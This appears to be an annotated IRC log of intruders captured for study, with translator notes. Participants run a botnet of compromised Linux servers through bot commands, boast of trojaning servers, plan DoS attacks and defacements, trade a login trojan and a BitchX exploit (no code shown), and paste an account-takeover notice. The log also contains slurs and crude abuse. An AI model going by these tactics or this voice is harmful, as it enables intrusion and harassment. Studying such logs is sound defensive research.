      :Sp07 :heh
      :Sp07 :not weed in your garden or anything
      :Sp07 :the drug
      :Sp07 :s
      :Sp07 :drug weed
      :Sp07 :I got some weed with me right now
      :D1ck :  192.168.1.22 => ns2.example.net [21]
      :D1ck :USER root
      :D1ck :CWD ~meltahir
      :Sp07 :but I cant smoke it cause my dads here
      :D1ck :man
      :D1ck :wtf is that?
      :Sp07 :cwd
      :Sp07 :that is like
      :Sp07 :umm
      :D1ck :haha
      :Sp07 :cd ~meltahir
      :Sp07 :like its a directory
      :D1ck :oh
      :D1ck :ah
      :D1ck ::)
      :D1ck :ok
      :Sp07 :its not his password hehe
      :Sp07 :[04:06] <PAKT>  Hackers and crackers wanna help us in #pakt ?? We need to hack the undernet and the fucking lame opers come join and ask |W|-|G| for more info, thanks for your help.. KILL THE UNDERNET
      :Sp07 :hahaha
      :Sp07 :lets go dos all of them
      :D1ck :hahahahaha
      :Sp07 :they kicked me =(
      :D1ck ::)
      :Sp07 :we need to do something on irc that will make us money
      :D1ck :<Paladin`> i help pakt out with the reporting of child pornographers
      :D1ck :AHAHAHAHAHA
      :Sp07 :ns3.example.net
      :D1ck :I WANT KIDDIE PORN
      :Sp07 :thats h4r33
      :D1ck :yeah i know
      :Sp07 :ACTION slaps sximap around a bit with a large trout
      :Sp07 :oops
      :D1ck :rofl
      :D1ck :man
      :D1ck :i`m hunguhry
      :Sp07 :go eat 
      :D1ck :its 4 am
      :Sp07 :go hunting
      :D1ck :and kithen is downstair
      :Sp07 :go hunt for some cockroaches
      :D1ck ::(
      :D1ck :rofl
      :Sp07 :mmMMmMMmmmmm
      :Sp07 :m
      :D1ck ::)
      :D1ck :?
      :D1ck :MY LINUX MECHS ROCKS
      :D1ck :%$#@
      :D1ck :i lost my 90 day uptime box
      :D1ck ::(
      :Sp07 :heh
      :Sp07 :ITS ALMOST TIME FOR ME TO SMOKE SOME WEEED
      :Sp07 :noddles?
      :Sp07 :hehe
      :D1ck :hahaa
      :D1ck :hehe
      :D1ck ::)
      :Sp07 :isnt it neat
      :Sp07 :eat
      :Sp07 :hehe
      :Sp07 :you think too much about food
      :D1ck ::)
      :D1ck :i`m FAT
      :D1ck ::)
      :D1ck :hehe
      :Sp07 :forr eal?
      :Sp07 :heh
      :Sp07 :you fat ass
      :D1ck :dont taunt me :(
      :Sp07 :how much do you weigh?
      :D1ck :):
      :Sp07 :sorry
      :D1ck :400 
      :D1ck :400 
      :D1ck :np
      :Sp07 :lol
      :D1ck ::)
      :Sp07 :for real
      :D1ck :oh well 300
      :D1ck ::)
      :Sp07 :how much do you weight?
      :D1ck :for real
      :D1ck :300 punds
      :Sp07 :for real?
      :D1ck :yes
      :Sp07 :you serious?
      :D1ck :for real
      :D1ck :
      :D1ck :yep
      :D1ck ::)
      :D1ck :serious
      :Sp07 :dont lie
      :Sp07 :hehe
      :D1ck :i`m FAT
      :Sp07 :300 is a lot
      :D1ck :as
      :D1ck :s
      :D1ck ::)
      :D1ck :nope i`m 300#$@
      :Sp07 :how old are you?
      :D1ck :17
      :D1ck :;>
      :Sp07 :DAMN
      :Sp07 :hehe
      :D1ck :kaos_ nick jupe
      :Sp07 :DAYUMMMMM
      :D1ck :kaos_ nick jupah
      :D1ck :.save
      :D1ck ::)
      :D1ck :welp, i`ll lose it
      :Sp07 :DAYYYYYYYYUMMMMMMMMMMMMMMMMMMM
      :Sp07 :M
      :Sp07 :does that look like H OR M?
      :D1ck :hahaa
      :Sp07 :H M
      :D1ck :dude
      :D1ck :4 years back
      :Sp07 :H M
      :Sp07 :H M
      :D1ck :i was 400
      :D1ck :and then i lost 200
      :Sp07 :DAYUMMMMMMMMM
      :Sp07 :you liar
      :D1ck :nutriotion
      :D1ck :and then
      :Sp07 :how can you be 400 pounds when your 13?
      :D1ck :I WAS
      :Sp07 :you liar
      :D1ck :tendency
      :D1ck :and
      :D1ck :lots of eating
      :D1ck :but then i left the diet and excersise
      :D1ck :but i`ll loose it again
      :D1ck :i`m serious now
      :D1ck ::)
      :Sp07 :400 is too much for a 13 year old
      :D1ck :when i`m serious imake sure to achieve the goal
      :Sp07 :maybe like 200 is cool
      :Sp07 :but 400
      :Sp07 :no way
      :D1ck :hahahaha
      :Sp07 :200 is still fat but 400 is like a fucking elephant
      :Sp07 :ehhe
      :D1ck :yep
      :Sp07 :I weigh like 150 right now
      :D1ck :200 with my height is all good.
      :D1ck :i`m 6,3
      :D1ck :i`m 6.3
      :Sp07 :your like twice as big as me
      :Sp07 :as in pounds
      :D1ck :lol
      :Sp07 :hehe
      :D1ck :i`m twice as big as 80% of the ppl
      :Sp07 :im like 5'8 I think
      :D1ck :in this world
      :D1ck ::)
      :D1ck :oh
      :Sp07 :thats humungus
      :Sp07 :hehe
      :D1ck :GIGANTIC
      :Sp07 :gorganic
      :Sp07 :TITANIC
      :D1ck : hahha
      :Sp07 :for real how much do you weigh??
      :Sp07 :hehe
      :D1ck :300
      :D1ck :i`m serious damit
      :Sp07 :DAYUMMMMMMMMMM
      :Sp07 :N
      :D1ck :i eat the whole fucking day with no excersise
      :D1ck ::)
      :Sp07 :N H M
      :Sp07 :those 3 letters look the same
      :D1ck :i`ll get lYPO sUcKtiON
      :Sp07 :i dont excercise that much too
      :Sp07 :but I dont weight that much
      :D1ck :<= tendancy
      :Sp07 :whats tendancy mean
      :D1ck :U ARE A AMERICAN AND I SPEAK BETTER ENGLISH THEN U?
      :D1ck :HEHEHEHE
      :D1ck :<Sp07> whats tendancy mean
      :Sp07 :hehehe
      :Sp07 :whats it mean?
      :D1ck :tendency mean that u have that inner inheritance
      :D1ck :to get BIG
      :D1ck ::)
      :Sp07 :oh
      :D1ck :u cant help
      :D1ck :u have to work VERY VERY hard
      :D1ck :i`m targetting to lloose 60 pounds
      :D1ck :in 2 months
      :D1ck ::)
      :Sp07 :me too
      :D1ck :how much u weigh
      :D1ck :?
      :Sp07 :i want to lose 100 pounds in 2 months
      :Sp07 :I weight 400 pounds
      :D1ck :haha
      :D1ck :LOL
      :Sp07 :hehehe
      :D1ck :seriously, i`m not joking
      :D1ck :
      :Sp07 :me too
      :D1ck :=p
      :D1ck :hehe k
      :D1ck :ure smart
      :Sp07 :thanks
      :Sp07 :herhe
      :D1ck :np
      :D1ck :heh
      :Sp07 :
      :Sp07 :
      :D1ck :so sup
      :Sp07 :
      :D1ck :
      :D1ck :?
      :D1ck :
      :D1ck :
      :Sp07 :MY DICK
      :D1ck :OH
      :D1ck :CAN I HAVE A GO
      :Sp07 :I WANT TO SMOKE WEED
      :D1ck :OR U WANT THE OTHE RGUY FIRST
      :D1ck :?
      :Sp07 :NO
      :D1ck :WEE
      :D1ck :WEED
      :D1ck :WEED
      :D1ck :WEED
      :Sp07 :WEEEEEEEEED
      :D1ck :what if the cops bust u
      :D1ck :???????
      :Sp07 :NOT IF I SMOKE AT MY BACKYARD
      :Sp07 :HEHE
      :Sp07 :THEY WONT BUST ME
      :D1ck :HEHEH
      :D1ck :well
      :D1ck :my freind
      :D1ck :got
      :D1ck :busted
      :D1ck :in
      :D1ck :canada
      :Sp07 :NOTHING BIG
      :D1ck :he was smoking in his backyard
      :Sp07 :THEY JUST TAKE YOUR WEED AWAY
      :D1ck :some one comlained
      :D1ck :and he was arrested
      :Sp07 :WELL GO FUCKING KILL THEM
      :D1ck :well
      :D1ck :ure parents get charged if yure's a juvenule
      :Sp07 :UHH
      :D1ck :under juvinile delinquent act
      :Sp07 :ITS NOT THAT BIG OF A DEAL
      :Sp07 :I GOT CAUGHT A LOT OF TIMES
      :D1ck :AND U CAN BE TRIED AS A DULT
      :D1ck :AND 
      :D1ck :BUSTED
      :Sp07 :NO YOU CANT
      :D1ck :
      :Sp07 :THEY JUST TAKE YOUR WEED
      :D1ck :oh
      :D1ck :hahahaha
      :Sp07 :AND THEN THEY GO SMOKE IT
      :D1ck :j/k
      :D1ck :J/K
      :Sp07 :THOSE BASTARDS
      :Sp07 :CAN
      :Sp07 :SUCK
      :Sp07 :MY
      :Sp07 :DIACK
      :D1ck :HAHAHAHAHA
      :D1ck :complain@
      :D1ck :DOES YURE MOM AND DAD SMOKE MARAJUANA
      :D1ck :?
      :Sp07 :NO
      :D1ck :that sucks
      :D1ck :
      :Sp07 :IF I COMPLAIN THEY WILL GET THOSE STICKS AND BEAT ME
      :D1ck :all my freinds in canada's mom dad, stem mom stepdad smoked weed
      :D1ck :HAHAHAHAHAHA
      :D1ck :HAHAHAHAHAHA
      :Sp07 :HAHAHHHAHHHHHHHHHHHHHHHHHHHHHHHH
      :D1ck :HAHAHHHAHHHHHHHHHHHHHHHHHHHHHHHHAHAHAHAHAHA
      :Sp07 :ITS TRUE
      :Sp07 :THEY ARE NOT COPS
      :Sp07 :THEY ARE A GOVERNMENT GANG
      :D1ck :smoking marjuana is likee 'cool'?
      :Sp07 :I GUESS
      :Sp07 :ITS FUN
      :D1ck :oh
      :Sp07 :ITS NOT LIKE SMOKING
      :D1ck :it tastes good?
      :Sp07 :NO ITS NOT LIKE SMOKING
      :Sp07 :SMOKING CIGARETES IS LIKE POINTLESS
      :Sp07 :WEED AFFECTS YOUR MIND AND BODY
      :D1ck :yep
      :D1ck :well
      :D1ck :?
      :D1ck :oh
      :D1ck :and u get hungary
      :D1ck :and 
      :D1ck :shit
      :D1ck :?
      :Sp07 :YUP
      :Sp07 :ITS NOT JUST THAT
      :Sp07 :I LOVE WEED
      :D1ck :coolk
      :D1ck :cool
      :Sp07 :IT TAKES ME TO MY OWN WORLD
      :Sp07 :MWUHAHAHAHAHA
      :D1ck :Ok i disclose my self.
      :D1ck :I`m a FED
      :Sp07 :??
      :Sp07 :OH SHIT
      :D1ck :You are busted
      :Sp07 :FUCK YOU
      :Sp07 :DIE MOTHER FUCKER
      :Sp07 :FOR REAL????
      :Sp07 :officer
      :D1ck :yes.
      :Sp07 :suck my dick
      :D1ck :dude
      :D1ck :relax
      :Sp07 :no wonder
      :Sp07 :how would a pakistanian know english
      :Sp07 :its all clear
      :Sp07 :hey
      :D1ck :hehe
      :Sp07 :your not really a fed right??
      :D1ck :y0
      :D1ck :?
      :Sp07 :dont even joke like that
      :D1ck :nope
      :D1ck :ok
      :Sp07 :MAKES ME FEEL NERVOUS
      :D1ck :i`m not a fed
      :D1ck :why did u take it so serious?
      :Sp07 :I DUNNO
      :D1ck :oh
      :D1ck :ok
      :D1ck ::P
      :D1ck :if i was a fed
      :Sp07 :SHIT MY DADS LEAVING
      :Sp07 :TIME TO GET HIGH
      :D1ck :i wont be liek hacking shit
      :D1ck :hahahaa
      :D1ck :ok
      :Sp07 :HOPEFULLY HE WONT BE BACK FOR A WHILE
      :D1ck :<Sp07> FUCK YOU
      :D1ck :<Sp07> DIE MOTHER FUCKER
      :D1ck :<Sp07> FOR REAL????
      :D1ck :<Sp07> officer
      :D1ck :hehehe
      :Sp07 :DAMN HIS CAR IS NOT PULING OUT THE DRIVEWAY
      :D1ck :hehee
      :Sp07 :IF FEDS WERE TRYING TO CATCH ME FOR THE SHIT IVE DONE LONG TIME AGO
      :Sp07 :THAT WOULD BE FUCKED UP CAUSE I STOPPED DOING ILLEGAL SHIT NOW
      :D1ck :yep
      :Sp07 :HIS CARS GONE
      :Sp07 :BRB
      :D1ck :man dont think i`m a fed
      :D1ck ::)
      :D1ck :i`m a elite hacker
      :D1ck :brb too
      :Sp07 :FUCK
      :Sp07 :HES GONNA COME RIGHT BACK
      :D1ck :lol
      :Sp07 :*SNIFF* *SNIFF* 
      :Sp07 :I WANT TO SMOKE WEED
      :D1ck :no one else at home
      :D1ck :bro?
      :D1ck :sis
      :D1ck :mom
      :D1ck :?
      :Sp07 :MY BROTHER
      :Sp07 :BUT I DONT GIVE A FUCK
      :Sp07 :I WILL KILL HIM IF HE TELLS
      :Sp07 :HEHE
      :D1ck :LOL
      :Sp07 :HES A LITTLE KID HE DOESNT KNOW WHAT THE FUCK IS GOING ON
      :D1ck :u guys can like smoke in front of parents eh?
      :D1ck :thats like col
      :Sp07 :HELL NO
      :D1ck :cool
      :D1ck :?
      :Sp07 :WHY DO YOU THINK WE CAN SMOKE IN FRONT OF PARENTS?
      :Sp07 :FUCK YOU FED
      :Sp07 :STOP ASKING ME QUESTIONS
      :D1ck :heh
      :D1ck :coz all my freinds did
      :D1ck :
      :Sp07 :WELL DOWN IN AMERICA ITS DIFFERENT
      :D1ck :oh
      :Sp07 :YOUR A FED
      :D1ck :no
      :Sp07 :YES
      :D1ck :i`m not
      :D1ck :hehe
      :Sp07 :YES
      :Sp07 :YES
      :D1ck :man
      :D1ck :man
      :D1ck :if i were a fed
      :D1ck :why would i hack stuff?
      :D1ck :defacements
      :D1ck :qall
      :Sp07 :UHHH SO YOU SAY
      :D1ck :all these bots
      :Sp07 :JUST TO GET IN THE CROWD OF HACKERS
      :D1ck :no
      :D1ck :hehehe
      :D1ck :lol
      :Sp07 :THESE BOTS COULD BE PAYED BY THE GOVERNMENT
      :D1ck :hahah
      :D1ck :man
      :Sp07 :YOU THINK FEDS WONT DO ILLEGAL THINGS?
      :Sp07 :YEAH RIGHT
      :D1ck :what proof u want
      :D1ck :
      :D1ck :i live in pakistan
      :Sp07 :HOW DO I KNOW THAT/?
      :D1ck :call me
      :D1ck :o
      :Sp07 :GIMME YOUR #
      :D1ck :well
      :D1ck :599823
      :D1ck :call me
      :Sp07 :THATS NOT A REAL #
      :D1ck :that is
      :Sp07 :WHAT DO I PRESS ON THE PHONE
      :D1ck :9221 is the key
      :Sp07 :1-
      :Sp07 :WHAT?
      :Sp07 :19221599823???
      :D1ck :92 21 599823
      :D1ck :yea
      :D1ck :let me come with my real ip
      :Sp07 :CALL YOU SO YOU CAN TRACE MY PHONE #?
      :D1ck :man
      :Sp07 :HEHEHEEHE
      :D1ck :ask rr
      :Sp07 :just kidding
      :Sp07 :hahahaha
      :D1ck :*sigh&
      :D1ck :*sigh
      :D1ck :8:)
      :Sp07 :RR IS A FED TOO MAN
      :Sp07 :DIDNT YOU KNOW THAT?
      :D1ck :REALLY?
      :D1ck :COOOOOOOOL
      :D1ck :Sp07 
      :D1ck :are u there
      :D1ck :I AM A FED
      :D1ck ::)
      :Sp07 :?
      :Sp07 :afk
      :Sp07 :fuck tou
      :Sp07 :afk
      :D1ck :heeh
      :D1ck :k
      :D1ck :^6thsense join #grid
      :Sp07 :nacl
      :Sp07 :back
      :Sp07 :me go
      :Sp07 :bye bye
      :D1ck :dns-xxx join #grid 
      :D1ck :.part #grid 
      
      =-=
      
      Day 06 June 9
      
      :jupe__
      :D1ck :J4n3 
      :J4n3 :D1ck
      :D1ck :sup
      :D1ck ::)
      :J4n3 :i can't access www.example.com  with the user k1dd13 and pass u gave
      :D1ck :shit
      :D1ck :i think they clsoed the site?
      :D1ck :even soulslack couldnt
      :J4n3 :erhmm
      :D1ck :sha..d4v3
      :J4n3 :yup that is
      :D1ck :hmm
      :D1ck :site works?
      :J4n3 :wait
      :J4n3 :yup
      :J4n3 :site is working
      :D1ck :yaar
      :D1ck :hmm
      :D1ck :may be that little fuck changed it?
      :D1ck :i logged in witht he pass some while go
      :D1ck :sha..d4v3
      :D1ck :in the url did u choose www.example.com?
      :D1ck :in the url did u choose www.example.com?
      :D1ck :in the url did u choose www.example.com?
      :J4n3 :wait lemme login from webstie
      :J4n3 :website
      :J4n3 :yeah
      :J4n3 :i did
      :D1ck :oki
      :D1ck :oh
      :D1ck :website say karo
      
      do it from the website
      
      :D1ck :oki
      :D1ck :oye brb p00p
      :J4n3 :k
      :D1ck :~back
      :D1ck :sigh
      :D1ck ::)
      :J4n3 :ATTENTION:
      :J4n3 :Some users password information became corrupted during a hard drive backup. This is easily fixed if you
      :J4n3 :following the instructions below.
      :J4n3 :1) Go to www.example.com and log in as normal EXCEPT where it asks for your password leave it blank.
      :J4n3 :2) Once you are in your example.com account manager click on Account Information in the bottom right.
      :J4n3 :3) Next click on change password.
      :J4n3 :4) Now you are asked to type in your current password and your new passwords. Just leave the current password
      :J4n3 :opti
      :D1ck :hmmm
      :D1ck :do it@?
      :J4n3 :trying to do it, logged in from www   but again same message
      :J4n3 :trying from www.example.com
      :J4n3 :ek tho ek gantay main page load hotha hai iska
      
      one is that it takes an hour for the page to load
      
      :J4n3 ::(
      :D1ck :hmmmm
      :D1ck :hehe
      :D1ck :get it some where else?
      :J4n3 :do u have those htmls in a zip file etc ?
      :D1ck :oye
      :D1ck :J4n3 
      :D1ck :send me that linux login trojan
      :D1ck :not root/owned
      :D1ck :the other wala
      
      the other one (wala = one, in a person connotation, like "the one")
      
      :D1ck ::)
      :D1ck :yep
      :D1ck :i think i do
      :J4n3 :its on ftp get it
      :J4n3 :shell.example.net
      :D1ck :oki
      :D1ck :whats  the pass?
      :D1ck :user pass?
      :D1ck :oki
      :D1ck :ACTION is away: (sex) [BX-MsgLog On]
      :D1ck :ACTION is back from the dead. Gone 0 hrs 0 min 2 secs
      :J4n3 :hehe
      :D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
      :D1ck :gridisgay nick wise
      :gridisgay
      :D1ck :gridsux hostile
      :D1ck :gridsux nick le
      :gridsux
      :D1ck :gridsux nick hostile
      :D1ck :kaos__ nick thor`
      :kaos__
      :D1ck :kaos___ nick nohup
      :D1ck :kaos_ nick host-t-ns
      :kaos_
      :D1ck :kaos___ nick nohup-
      :D1ck :.add D1ck * D1ck 100 1 4
      NOTICE D1ck :Handle D1ck is already in use
      :D1ck :.save'
      :D1ck :.save
      NOTICE D1ck :Lists saved to file emech233.users
      NOTICE D1ck :Levels were written to ./mech.levels
      :D1ck :kaos____ nick nohup-
      :kaos____
      :D1ck :nohup- nick nohup
      :nohup-
      :D1ck :nohup  save
      :D1ck :hehe
      :D1ck :hafeeeez
      :D1ck :.add J4n3 * J4n3 100 1 4
      NOTICE D1ck :Handle J4n3 is already in use
      :D1ck :.save
      NOTICE D1ck :Lists saved to file emech233.users
      NOTICE D1ck :Levels were written to ./mech.levels
      :D1ck :all new LINUX BOTS
      :D1ck :ner hot 
      :J4n3_
      :D1ck :J4n3 
      :D1ck :
      :D1ck ::)
      :D1ck :mera babies
      
      my babies
      
      :D1ck :eheheh
      :J4n3 :D1ck :)
      :J4n3 ::O)
      :D1ck ::)
      :D1ck :sup?
      :D1ck :scan isps for bind
      :D1ck :we`ll deface indian pages
      
      [note from Saumil: those bastards]
      
      :D1ck ::)
      :J4n3 :errr yeah actually us raath j0e kay server par sub delete karna para tha
      
      err yeah actually that one night we had to delete everything from j0e's server
      
      :J4n3 :thakay usay patha na chalay kay mainay scanning ke the
      
      that he wouldnt come to know that i did scanning from it
      
      :D1ck :oh
      :D1ck :
      :D1ck :oki
      :D1ck :hehehe
      :J4n3 :aaj raath jama kartha hon linux say khud he
      
      tonight i will assemble (collect) everything from linux itself
      
      :D1ck :where is my account?
      :J4n3 :oye worldtel r0x now
      :D1ck :jeje
      :J4n3 ::p
      :D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
      :J4n3 :D1ck
      :D1ck :yo
      :J4n3 :site is up at www.example.net
      :J4n3 :i will set up graphics and cgi password stuff tomorrw
      :D1ck :kewl
      :J4n3 :but 
      :D1ck :oki
      :J4n3 :tell me where is the link of that passwod page ?
      :J4n3 :i mean where u want to put that password page link ?
      :D1ck :?????
      :D1ck :oh
      :D1ck : /elite-sploit-59865.html
      :D1ck :?
      :J4n3 :u want that sploit page na ?? where should be the link for it from main page ?
      :D1ck :nope hidden
      :D1ck :nope hidden
      :D1ck :
      :J4n3 :ok
      :J4n3 ::)
      :D1ck :;)
      :J4n3 :www.example.net/members ?
      :D1ck :yep
      :D1ck :yep
      :J4n3 :h4r33 is ~intrusion@ns3.example.net.xx * ONLY GOD CAN JUDGE ME
      :J4n3 :h4r33 on @#delusion 
      :D1ck :hahaha
      :D1ck : SignOff h4r33: #LinuxSex (Ping timeout for h4r33[ns3.example.net.xx])
      :J4n3 :hehe 
      :J4n3 :i'm dosin satnet
      :D1ck :hehe
      :D1ck :kewl
      :D1ck :ahhahhAhaHAhahHAha
      :J4n3 :can't u see all ping time out lol
      :D1ck :hahaha
      :J4n3 :ph34r my b4ndw17h :pPpPpPP
      :D1ck ::)
      :D1ck :i pjh34r yure sk1llz muh sand niggah
      :D1ck :hehe
      :J4n3 :lol 
      :J4n3 :tight :p
      :J4n3 :oye
      :J4n3 :i have a sploit for BitchX buffer overflow
      :J4n3 :but codin kuch sahi nahin
      
      but the coding isnt correct
      
      :J4n3 :it will get a root shell on some port
      :J4n3 :BitchX 75 pana 
      :J4n3 :or 74 i think
      :D1ck :hmmmm
      :D1ck :send me the code.
      :J4n3 :itn in linux, get it later when i boot
      :D1ck :J4n3 
      :D1ck :?
      :D1ck :i`ll get 32 more bots tommorow
      :D1ck ::)
      :D1ck :oye
      :D1ck :cant access example.net
      :J4n3 :huh ?
      :J4n3 :its working fine
      :J4n3 :www.example.net
      :D1ck :hehe
      :D1ck :i tried
      :D1ck :permission denied
      :J4n3 :acha wait
      
      acha = ok, or good
      
      :D1ck ::)
      :J4n3 :D1ck try now
      :D1ck :ok
      :D1ck :brb
      :J4n3 :kkzkk
      :J4n3 :hiall nick y00z
      :hiall
      :D1ck :J4n3 
      :D1ck :there?
      :D1ck :just got back
      :D1ck :.add D1ck * D1ck 100 1 4
      NOTICE D1ck :Handle D1ck is already in use
      :D1ck :.save
      NOTICE D1ck :Lists saved to file emech233.users
      NOTICE D1ck :Levels were written to ./mech.levels
      :D1ck :kaos1299 nick link
      :D1ck :kaos2440 weener
      :D1ck :kaos452 nick queer
      :D1ck :kaos6065 nick wtf
      :kaos6065
      :D1ck :kaos6567 nick ping
      :D1ck :kaos6927 nick smurf6
      :kaos6927
      :D1ck :kaos7950 nick rofl
      :D1ck :%kaos7950 nick hierachy
      :D1ck :kaos93 nick anarchy^
      :D1ck :kaos9719 nick ultralame
      :kaos9719
      :D1ck :kaos_ nick host-l
      :kaos_
      :D1ck :kaos__ nick software
      :kaos__
      :D1ck :kaos___ nick oracle
      :kaos___
      :D1ck :kaos___ nick java
      :D1ck :kaos____ nick argv[1]
      :kaos____
      :D1ck :kaos_____ nick dotcom
      :D1ck :brb
      :J4n3 :op me
      :J4n3 :op me
      :J4n3 :op me
      :J4n3 :op me
      :J4n3 :JAVED thanx :p
      :J4n3 :tryin some more :p brb
      :D1ck :.add D1ck * D1ck 100 1 4
      NOTICE D1ck :Handle D1ck is already in use
      :D1ck :.save
      NOTICE D1ck :Lists saved to file emech233.users
      NOTICE D1ck :Levels were written to ./mech.levels
      :D1ck :_aos_____ nick lagged
      :_aos_____
      :D1ck :___s_____ nick xinetd
      :___s_____
      :D1ck :kaos1299 nick tsmurf
      :kaos1299
      :D1ck :kaos2440 nick HISTFILE
      :kaos2440
      :D1ck :kaos3708 nick cunt`
      :kaos3708
      :D1ck :kaos452 nick whore-
      :D1ck :kaos6567 nick tumble
      :D1ck :kaos7056 nick debain
      :kaos7056
      :D1ck :kaos7950  nick PHAT
      :kaos7950
      :D1ck :kaos891 nick nEtbSd
      :kaos891
      :D1ck :kaos9379 nick solaris
      :D1ck :kaos_ nick unix-r
      :D1ck :kaos__ nick slackware
      :kaos_
      :D1ck :kaos____ nick romance
      :kaos____
      :D1ck :kaos_____ nick ZoRRo^
      :kaos_____
      :D1ck :kaos4230 nick [A]]]
      :kaos4230
      :D1ck :kaos452 nick [b]]]
      :kaos452
      :D1ck :kaos6511 nick gb
      :kaos6511
      :D1ck :kaos9379 nick heat
      :D1ck :%_aos_____ nick kr-subnet
      :D1ck :.save
      NOTICE D1ck :Lists saved to file emech233.users
      NOTICE D1ck :Levels were written to ./mech.levels
      :D1ck :.add D1ck * D1ck 100 1 4
      NOTICE D1ck :Handle D1ck is already in use
      :D1ck :.save
      NOTICE D1ck :Lists saved to file emech233.users
      NOTICE D1ck :Levels were written to ./mech.levels
      :D1ck :_aos_____ nick jang
      :_aos_____
      :D1ck :.add D1ck * D1ck 100 1 4
      NOTICE D1ck :Handle D1ck is already in use
      :D1ck :.save
      NOTICE D1ck :Lists saved to file emech233.users
      NOTICE D1ck :Levels were written to ./mech.levels
      :kaos9379
      :D1ck :kaos1024 nick pop3
      :D1ck :kaos2922 nick imapd
      :kaos2922
      :D1ck :kaos3854 nick syko
      :D1ck :kaos4752 nick bitch_
      :kaos4752
      :D1ck :kaos3854 nick sykoseal
      :kaos3854
      :D1ck :__os_____ nick xperience
      :D1ck :_________ nick line
      :_________
      :D1ck :_________ nick line
      :D1ck :_________ nick linely
      :D1ck :wtf
      :D1ck :__os_____ nick SEX
      :__os_____
      :D1ck :.add D1ck * D1ck 100 1 4
      NOTICE D1ck :Handle D1ck is already in use
      :D1ck :.save
      NOTICE D1ck :Lists saved to file emech233.users
      NOTICE D1ck :Levels were written to ./mech.levels
      :kaos_
      :D1ck :J4n3 
      :D1ck :J4n3 
      :J4n3 :fuck
      :J4n3 :fuck
      :D1ck :fuck?
      :D1ck Sp07 :Bitch-X BaBy
      :J4n3 :thanx :P
      :J4n3 :Haji bana diya betay betay
      
      Ok made it boy
      
      :D1ck :hehe come with yure ip i`ll add u to the new 40 bots
      :D1ck :i owned and trojaned 40 servers of linux in 3 hours
      :D1ck ::)))))
      :J4n3 :heh
      :J4n3 :damn 
      :D1ck :heh
      :J4n3 :107 bots
      :D1ck :yup
      :J4n3 :wait brb
      :D1ck :105 :P
      :J4n3 :back
      :D1ck :kewl
      :D1ck :one sec
      :J4n3 :kkz
      :D1ck :.add J4n3 * J4n3 100 1 4
      NOTICE D1ck :Handle J4n3 is already in use
      :D1ck :.save
      NOTICE D1ck :Lists saved to file emech233.users
      NOTICE D1ck :Levels were written to ./mech.levels
      :D1ck :.say hehe
      PRIVMSG 
      :Ott0 :hehe
      :anker :hehe
      :sshd :hehe
      :grep :hehe
      :jolt` :hehe
      :le :hehe
      :grep-v :hehe
      :netra :hehe
      :DEATHaCeS :hehe
      :Tota1KaaS :hehe
      :k-rad- :hehe
      :inetd-s :hehe
      :rpcbind :hehe
      :nohup :hehe
      :IgVip :hehe
      :save :hehe
      :Nine-mm :hehe
      :Animator_ :hehe
      :|ssh| :hehe
      :bevelz :hehe
      :spl1terz :hehe
      :jupe_ :hehe
      :wise :hehe
      :host-t-ns :hehe
      :s3ga :hehe
      :jupe2-bot :hehe
      :thor` :hehe
      :deb1an :hehe
      :w0lf_ :hehe
      :ttys1 :hehe
      :\dev\idle :hehe
      :slack :hehe
      :init-tab :hehe
      :cr4cked :hehe
      :Azz-Man :hehe
      :s1ack :hehe
      :Sun- :hehe
      :sximap :hehe
      :rewter :hehe
      :redcap :hehe
      :lickerz :hehe
      :host-l :hehe
      :software :hehe
      :DoS_ :hehe
      :pr0be- :hehe
      :des|re :hehe
      :satan^666 :hehe
      :digi-x :hehe
      :pathanb0t :hehe
      :b3473r :hehe
      :pimpX :hehe
      :d1g1tal :hehe
      :k-r4d :hehe
      :t0sh1ba :hehe
      :jupah :hehe
      :jupe-bot :hehe
      :CyneX :hehe
      :OngHome :hehe
      :ath0 :hehe
      :ath0_ :hehe
      :obsleet :hehe
      :kaos___ :hehe
      :unix-r :hehe
      :gb :hehe
      :heat :hehe
      :line :hehe
      :romance :hehe
      :wtf :hehe
      :jang :hehe
      :kaos6567 :hehe
      :smurf6 :hehe
      :bitch_ :hehe
      :nEtbSd :hehe
      :cunt` :hehe
      :s0lar1s :hehe
      :r00t^666 :hehe
      :Nickless :hehe
      :imapd :hehe
      :kaos__ :hehe
      :peniswise :hehe
      :VsnL2 :hehe
      
      [note from Saumil: this system is actually in India - in Bangalore. VSNL is a nationwide ISP.]
      
      :[A]]] :hehe
      :kaos1024 :hehe
      :[b]]] :hehe
      :sykoseal :hehe
      :debain :hehe
      :SEX :hehe
      :ZoRRo^ :hehe
      :lagged :hehe
      :PHAT :hehe
      :xinetd :hehe
      :argv[1] :hehe
      :tsmurf :hehe
      :ultralame :hehe
      :J4n3 :lol
      :J4n3 :.say y0 y0
      :tr1cks :y0 y0
      :Animator_ :y0 y0
      :|ssh| :y0 y0
      :bevelz :y0 y0
      :spl1terz :y0 y0
      PRIVMSG 
      :Nine-mm :y0 y0
      :wise :y0 y0
      :host-t-ns :y0 y0
      :deb1an :y0 y0
      :s1ack :y0 y0
      :sximap :y0 y0
      :\dev\idle :y0 y0
      :r00t^666 :y0 y0
      :rewter :y0 y0
      :Azz-Man :y0 y0
      :Sun- :y0 y0
      :w0lf_ :y0 y0
      :s0lar1s :y0 y0
      :redcap :y0 y0
      :slack :y0 y0
      :init-tab :y0 y0
      :cr4cked :y0 y0
      :ttys1 :y0 y0
      :Ott0 :y0 y0
      :jolt` :y0 y0
      :pr0be- :y0 y0
      :des|re :y0 y0
      :digi-x :y0 y0
      :pathanb0t :y0 y0
      :chill3r :y0 y0
      :jupe2-bot :y0 y0
      :s3ga :y0 y0
      :software :y0 y0
      :thor` :y0 y0
      :host-l :y0 y0
      :DoS_ :y0 y0
      :anker :y0 y0
      :sshd :y0 y0
      :grep :y0 y0
      :le :y0 y0
      :grep-v :y0 y0
      :netra :y0 y0
      :DEATHaCeS :y0 y0
      :Tota1KaaS :y0 y0
      :k-rad- :y0 y0
      :inetd-s :y0 y0
      :nohup :y0 y0
      :IgVip :y0 y0
      :save :y0 y0
      :OngHome :y0 y0
      :ath0 :y0 y0
      :lickerz :y0 y0
      :var1ant :y0 y0
      :ath0_ :y0 y0
      :jupah :y0 y0
      :b3473r :y0 y0
      :pimpX :y0 y0
      :d1g1tal :y0 y0
      :k-r4d :y0 y0
      :t0sh1ba :y0 y0
      :kaos___ :y0 y0
      :unix-r :y0 y0
      :gb :y0 y0
      :heat :y0 y0
      :[b]]] :y0 y0
      :line :y0 y0
      :sykoseal :y0 y0
